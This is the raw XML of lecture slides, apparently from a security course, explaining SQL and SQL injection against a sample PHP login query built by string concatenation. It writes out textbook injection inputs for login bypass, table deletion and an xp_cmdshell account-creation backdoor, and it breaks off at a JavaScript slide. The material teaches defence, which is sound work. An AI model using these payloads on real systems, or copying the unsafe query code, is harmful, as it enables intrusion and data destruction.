                        <a:t>vidalia@bc.com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/>
                        <a:t>1bjb9a93</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="483850"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chemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pearl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chemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>F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chemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>10000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200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>pearl@bc.com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200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ziog9gga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sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2338189" y="6124448"/>
            <a:ext cx="8684022" cy="4600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7" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2395084" y="2553217"/>
            <a:ext cx="8684023" cy="3800460"/>
            <a:chOff x="-651619" y="-129875"/>
            <a:chExt cx="8684021" cy="3800458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="585" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-651620" y="463634"/>
              <a:ext cx="8684023" cy="3206950"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13711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6" name="Table"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2863273" y="-129876"/>
              <a:ext cx="118484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Table</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="590" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134239" y="2910429"/>
            <a:ext cx="3524310" cy="681034"/>
            <a:chOff x="2345730" y="-12655"/>
            <a:chExt cx="3524308" cy="681032"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="588" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2345730" y="358011"/>
              <a:ext cx="1071403" cy="310367"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 35188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9" name="Table name"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3437233" y="-12656"/>
              <a:ext cx="2432807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Table name</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="593" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2577863" y="3506730"/>
            <a:ext cx="1695922" cy="3527642"/>
            <a:chOff x="757243" y="-906558"/>
            <a:chExt cx="1695921" cy="3527641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="591" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="824865" y="-906559"/>
              <a:ext cx="1560678" cy="2925723"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29359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2" name="Column"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="757243" y="2024183"/>
              <a:ext cx="169592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Column</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="596" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2130042" y="4361445"/>
            <a:ext cx="10829854" cy="1117601"/>
            <a:chOff x="-290667" y="-148723"/>
            <a:chExt cx="10829852" cy="1117600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="594" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-290668" y="200276"/>
              <a:ext cx="9015779" cy="419601"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst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5" name="Row…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8675013" y="-148724"/>
              <a:ext cx="1864173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Row</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a: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(Record)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="SELECT Age FROM Users WHERE Name=‘Greg’;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2453565" y="7255346"/>
            <a:ext cx="679559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SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> Age FROM Users WHERE Name=‘Greg’;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9253118" y="7157091"/>
            <a:ext cx="56919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34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="UPDATE Users SET email=‘mr.uni@bc.com’    WHERE Age=34; -- this is a comment"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2453565" y="7747608"/>
            <a:ext cx="646025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UPDATE</a:t>
            </a:r>
            <a:r>
              <a:t> Users SET email=‘mr.uni@bc.com’</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>   WHERE Age=34; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- this is a comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="mr.uni@bc.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750432" y="5171077"/>
            <a:ext cx="2556736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2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>mr.uni@bc.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="INSERT INTO Users Values(‘Pearl’, ‘F’, ...);"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433935" y="8559458"/>
            <a:ext cx="74662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INSERT</a:t>
            </a:r>
            <a:r>
              <a:t> INTO Users Values(‘Pearl’, ‘F’, ...);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="DROP TABLE Users;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433935" y="8940186"/>
            <a:ext cx="293924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DROP</a:t>
            </a:r>
            <a:r>
              <a:t> TABLE Users;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373544261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 animBg="1" advAuto="0"/>
      <p:bldP spid="584" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="587" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="587" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="590" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="590" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="593" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="593" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="596" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="596" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="597" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="598" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="599" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="600" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="600" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="601" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="602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erver-side co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Server-side code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="4884425"/>
            <a:ext cx="86399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where(name=‘$user’ and password=‘$pass’);”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="606" name="Screen Shot 2014-02-18 at 1.58.14 AM.png" descr="Screen Shot 2014-02-18 at 1.58.1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2471" y="2930442"/>
            <a:ext cx="8599858" cy="995774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Website"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965454" y="2447541"/>
            <a:ext cx="173682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Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="“Login code” (PHP)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884225" y="4325928"/>
            <a:ext cx="411889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“Login code” </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr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09" name="Suppose you successfully log in as $user if this returns any results"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885924" y="6064958"/>
            <a:ext cx="808022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400">
                <a:solidFill>
                  <a:srgbClr val="030000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Suppose you successfully log in as $user</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>if this returns any results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="How could you exploit this?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3591265" y="7630912"/>
            <a:ext cx="582226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How could you exploit this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222841368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QL inj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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1889360" y="4884425"/>
            <a:ext cx="86399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where(name=‘$user’ and password=‘$pass’);”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="616" name="Screen Shot 2014-02-18 at 1.58.14 AM.png" descr="Screen Shot 2014-02-18 at 1.58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471" y="2930442"/>
            <a:ext cx="8599858" cy="9957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0" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2321907" y="3482799"/>
            <a:ext cx="5052265" cy="1000525"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5052263" cy="1000523"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="617" name="frank’ OR 1=1); --"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14642" y="378223"/>
              <a:ext cx="5037622" cy="6223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3400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5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frank’ OR 1=1); -- </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="618" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="813516" cy="429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619" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1879521" y="1033"/>
              <a:ext cx="1732347" cy="4106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621" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="6123727"/>
            <a:ext cx="7298594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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frank’ OR 1=1);</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--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1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			and password=‘whocares’);</a:t>
            </a:r>
            <a:r>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Login successful!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523492" y="7693230"/>
            <a:ext cx="995781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Login successful!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Problem: Data and code mixed up together</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241930570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0" animBg="1" advAuto="0"/>
      <p:bldP spid="621" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="622" grpId="0" build="p" bldLvl="5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QL injection: Wo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SQL injection: Worse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1889360" y="4884425"/>
            <a:ext cx="86399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where(name=‘$user’ and password=‘$pass’);”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="626" name="Screen Shot 2014-02-18 at 1.58.14 AM.png" descr="Screen Shot 2014-02-18 at 1.58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471" y="2930442"/>
            <a:ext cx="8599858" cy="9957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0" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2321907" y="3482799"/>
            <a:ext cx="9716464" cy="1000525"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9716462" cy="1000523"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="627" name="frank’ OR 1=1); DROP TABLE Users; --"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14642" y="378223"/>
              <a:ext cx="9701821" cy="6223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3400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5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t>frank’ OR 1=1); DROP TABLE Users; -- </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="628" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="813516" cy="429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629" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1879522" y="1033"/>
              <a:ext cx="5473979" cy="40331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631" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="5958627"/>
            <a:ext cx="729859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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frank’ OR 1=1);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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       DROP TABLE Users;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--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1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			and password=‘whocares’);</a:t>
            </a:r>
            <a:r>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Can chain together statements with semicolon: STATEMENT 1 ; STATEMENT 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611374" y="7556511"/>
            <a:ext cx="9782052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Can chain together statements with semicolon:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>STATEMENT 1 ; STATEMENT 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32932385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QL injection: Even wor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SQL injection: Even worse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1889360" y="4884425"/>
            <a:ext cx="863993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where(name=‘$user’ and password=‘$pass’);”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="636" name="Screen Shot 2014-02-18 at 1.58.14 AM.png" descr="Screen Shot 2014-02-18 at 1.58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471" y="2930442"/>
            <a:ext cx="8599858" cy="9957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0" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150404" y="3521025"/>
            <a:ext cx="7353503" cy="1015702"/>
            <a:chOff x="-1" y="-57024"/>
            <a:chExt cx="7353502" cy="1015701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="637" name="’); EXEC cmdshell ‘net user badguy backdoor / ADD’; --"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14642" y="420069"/>
              <a:ext cx="4675959" cy="538608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3000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5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r>
                <a:rPr dirty="0"/>
                <a:t>’); EXEC </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0" err="1"/>
                <a:t>cmdshell</a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0" smtClean="0"/>
                <a:t>‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>…</a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0" smtClean="0"/>
                <a:t>’; </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0"/>
                <a:t>-- </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="638" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-28086"/>
              <a:ext cx="2925562" cy="4579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639" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4026402" y="-57024"/>
              <a:ext cx="3327099" cy="4613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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="5941547"/>
            <a:ext cx="5544788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$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>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where(name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’);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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--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1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			and password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whocares</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/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135624656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exploits_of_a_mom.png" descr="exploits_of_a_m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047" y="2581916"/>
            <a:ext cx="10834706" cy="3335008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http://xkcd.com/327/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4134657" y="6545160"/>
            <a:ext cx="4048939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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3941496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Rather than static or dynamic HTML, web pages can be a program written in Javascript:"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1270000"/>
            <a:ext cx="11099800" cy="2373459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Rather than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>just </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>, web pages can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a program written in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="&lt;html&gt;&lt;body&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514054" y="3808093"/>
            <a:ext cx="7976692" cy="2730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CB3F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&lt;html&gt;&lt;body&gt;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Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;b&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;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	var a = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>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	var b = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
